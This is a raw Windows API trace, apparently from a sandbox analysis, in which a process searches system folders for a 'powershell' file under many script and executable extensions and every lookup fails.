	[0809.426] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.856] SetErrorMode (uMode=0x1) returned 0x1
	[0810.863] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.863] SetErrorMode (uMode=0x1) returned 0x1
	[0810.863] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.871] SetErrorMode (uMode=0x1) returned 0x1
	[0810.873] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.873] SetErrorMode (uMode=0x1) returned 0x1
	[0810.873] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.882] SetErrorMode (uMode=0x1) returned 0x1
	[0810.883] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.883] SetErrorMode (uMode=0x1) returned 0x1
	[0810.883] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.894] SetErrorMode (uMode=0x1) returned 0x1
	[0811.895] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.895] SetErrorMode (uMode=0x1) returned 0x1
	[0811.895] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.910] SetErrorMode (uMode=0x1) returned 0x1
	[0811.911] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.911] SetErrorMode (uMode=0x1) returned 0x1
	[0811.912] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.920] SetErrorMode (uMode=0x1) returned 0x1
	[0811.921] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.921] SetErrorMode (uMode=0x1) returned 0x1
	[0811.922] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.930] SetErrorMode (uMode=0x1) returned 0x1
	[0811.931] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.931] SetErrorMode (uMode=0x1) returned 0x1
	[0811.932] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.200] SetErrorMode (uMode=0x1) returned 0x1
	[0813.201] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.201] SetErrorMode (uMode=0x1) returned 0x1
	[0813.201] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.210] SetErrorMode (uMode=0x1) returned 0x1
	[0813.211] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.211] SetErrorMode (uMode=0x1) returned 0x1
	[0813.211] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.222] SetErrorMode (uMode=0x1) returned 0x1
	[0813.224] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.224] SetErrorMode (uMode=0x1) returned 0x1
	[0813.224] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.429] SetErrorMode (uMode=0x1) returned 0x1
	[0814.431] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0814.431] SetErrorMode (uMode=0x1) returned 0x1
	[0814.431] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.439] SetErrorMode (uMode=0x1) returned 0x1
	[0814.440] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0814.441] SetErrorMode (uMode=0x1) returned 0x1
	[0814.441] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.452] SetErrorMode (uMode=0x1) returned 0x1
	[0814.454] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0814.454] SetErrorMode (uMode=0x1) returned 0x1
	[0814.454] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.463] SetErrorMode (uMode=0x1) returned 0x1
	[0815.888] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0815.888] SetErrorMode (uMode=0x1) returned 0x1
	[0815.888] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.898] SetErrorMode (uMode=0x1) returned 0x1
	[0815.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.899] SetErrorMode (uMode=0x1) returned 0x1
	[0815.900] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.900] SetErrorMode (uMode=0x1) returned 0x1
	[0815.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.901] SetErrorMode (uMode=0x1) returned 0x1
	[0815.901] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.901] SetErrorMode (uMode=0x1) returned 0x1
	[0815.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.901] SetErrorMode (uMode=0x1) returned 0x1
	[0815.901] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.902] SetErrorMode (uMode=0x1) returned 0x1
	[0815.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.902] SetErrorMode (uMode=0x1) returned 0x1
	[0815.902] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.902] SetErrorMode (uMode=0x1) returned 0x1
	[0815.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.903] SetErrorMode (uMode=0x1) returned 0x1
	[0815.903] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.903] SetErrorMode (uMode=0x1) returned 0x1
	[0815.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.903] SetErrorMode (uMode=0x1) returned 0x1
	[0815.904] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.904] SetErrorMode (uMode=0x1) returned 0x1
	[0815.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.904] SetErrorMode (uMode=0x1) returned 0x1
	[0815.904] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.905] SetErrorMode (uMode=0x1) returned 0x1
	[0815.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.905] SetErrorMode (uMode=0x1) returned 0x1
	[0815.905] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.905] SetErrorMode (uMode=0x1) returned 0x1
	[0815.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.905] SetErrorMode (uMode=0x1) returned 0x1
	[0815.906] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.906] SetErrorMode (uMode=0x1) returned 0x1
	[0815.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.906] SetErrorMode (uMode=0x1) returned 0x1
	[0815.906] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.907] SetErrorMode (uMode=0x1) returned 0x1
	[0815.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.907] SetErrorMode (uMode=0x1) returned 0x1
	[0815.907] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.907] SetErrorMode (uMode=0x1) returned 0x1
	[0815.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.908] SetErrorMode (uMode=0x1) returned 0x1
	[0815.908] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.908] SetErrorMode (uMode=0x1) returned 0x1
	[0815.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.908] SetErrorMode (uMode=0x1) returned 0x1
	[0815.908] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.909] SetErrorMode (uMode=0x1) returned 0x1
	[0815.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.909] SetErrorMode (uMode=0x1) returned 0x1
